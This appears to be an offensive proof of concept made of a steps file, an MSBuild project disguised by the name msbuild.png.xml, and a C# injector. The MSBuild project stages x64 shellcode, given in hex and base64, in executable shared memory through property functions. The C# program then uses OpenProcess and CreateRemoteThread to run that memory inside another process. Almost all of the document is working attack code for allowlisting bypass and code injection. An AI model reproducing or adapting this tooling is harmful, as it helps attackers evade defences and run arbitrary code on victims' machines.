Capbility Diffusion 101 - MsBuild Sets - Shellcode.exe spikes - Shellcode Horcrux if you like that analogy.

_Steps.md

1. Open PowerShell
2. Set MSbuild GodMode Env Variable 
   $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
   Note: This "Serves" Shellcode in a memory mapped file. 
   This is no accessible to other processes. 
   Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
   I leave this for you to explore

4. Execute shellcode.exe msbuild This prints hex offset.  
5. I think that will work?

msbuild.png.xml

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!-- 
	
		Author: Casey Smith, Twitter: @subTee
		 
		License: BSD 3-Clause
	
		Full Working Details Here: https://www.youtube.com/watch?v=-sUXMzkh-jI
		
	-->
	<!--  set MSBUILDENABLEALLPROPERTYFUNCTIONS=1 -->
	<!-- 
	
	$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe poc.png 
	
	// x64 Process Exec Shellcode blob.
	
	byte[] shellcode = new byte[272] {
	0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
	0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
	0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
	0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
	0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
	0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
	0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
	0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
	0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
	0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
	0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
	0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
	0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
	0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
	0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
	0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
	0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
	0x63,0x00 };
	
	
	-->
	
	<!--  Debug List Assemblies
	
	<CreateItem Include="$([System.AppDomain]::CurrentDomain.GetAssemblies())" >
		<Output TaskParameter="Include" ItemName="TypeItems"/>
	</CreateItem>
	<Message Text="%(TypeItems.Identity)" />
	
	-->
	
	<!-- Load Some Assemblies -->
	
	<Message Text="$([System.Reflection.Assembly]::Load('System.IO') )" />
	<Message Text="$([System.Reflection.Assembly]::Load('System.IO.MemoryMappedFiles') )" />
	<Message Text="$([System.Reflection.Assembly]::Load('System.Runtime.InteropServices') )" />
	
	
	<PropertyGroup> 

		<!--GUID -->
		<MappedFileName>1c9360ac-dc0d-4cd8-bf32-c4380855b733</MappedFileName>
		
		<Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode>
		
		<CreateMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::CreateNew($(MappedFileName), $([System.Int64]::Parse(272)),$([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)))</CreateMemoryMappedFile>
		<WriteToMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream().Write($([System.Convert]::FromBase64String($(Shellcode))), 0, 272) )</WriteToMemoryMappedFile>
		<!-- Example To Return an IntPtr -->
		<GetRWXIntPtrMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream( $([System.Int64]::Parse(0)), $([System.Int64]::Parse(272)), $([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)).SafeMemoryMappedViewHandle.DangerousGetHandle().ToString("X"))</GetRWXIntPtrMemoryMappedFile>
		
		</PropertyGroup> 
		
	
	<Message Text="$(GetTypePrimitive)" />
	<Message Text="$(CreateMemoryMappedFile)" />
	<Message Text="$(GetRWXIntPtrMemoryMappedFile)" />
	
	<Message Text="$([System.Console]::ReadLine())" />
	
  </Target>
</Project>

shellcode.cs

// There are a number of ways to do this, In this example, you can host shellcode in one process.
// Then call in and exeucte it from another, this is the most basic.
// Better ideas are things like hostsing in MSbuild, Then executing in another, CreateRemoteThread, etc..
// Have fun, the basic idea here is modularity, and splitting 

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

// Code Adapation Here
// https://gist.githubusercontent.com/andreafortuna/b8cdf82932d11baaa779a5fbeb77526a/raw/db9edeec255bd98421fa562786f6f08206710c45/


	public class InjectionPoC
	{
		
		[DllImport("kernel32.dll")]
	    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
	
	    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
	    public static extern IntPtr GetModuleHandle(string lpModuleName);
	
	    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
	    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
	
	    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
	    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	
	    [DllImport("kernel32.dll", SetLastError = true)]
	    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
	
	    [DllImport("kernel32.dll")]
	    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		public static void Main(string[] args)
		{			
			if (args.Length == 0)
			{
			    System.Console.WriteLine("Please enter process name...");
			    System.Console.WriteLine("Usage: CodeInjectionPoC [process name]");
			    return;
			}

			Console.WriteLine("Start injection...");
			
			Process targetProcess;
			
			try {
				targetProcess = Process.GetProcessesByName(args[0])[0];	
			}
			catch {
				System.Console.WriteLine("Process " + args[0] + " not found!");
				return;
			}
			
			
			// Get process handler
			IntPtr process_handle = OpenProcess(0x1F0FFF, false, targetProcess.Id);
			
			IntPtr memory_allocation_variable =  new IntPtr(0x197C8B50000);
			// Create a thread that will call LoadLibraryA with allocMemAddress as argument
			if (CreateRemoteThread(process_handle, IntPtr.Zero, 0, memory_allocation_variable , IntPtr.Zero, 0,IntPtr.Zero) != IntPtr.Zero) {
				Console.Write("Injection done!");	
			} else {
				Console.Write("Injection failed!");	
			}				
		}
	}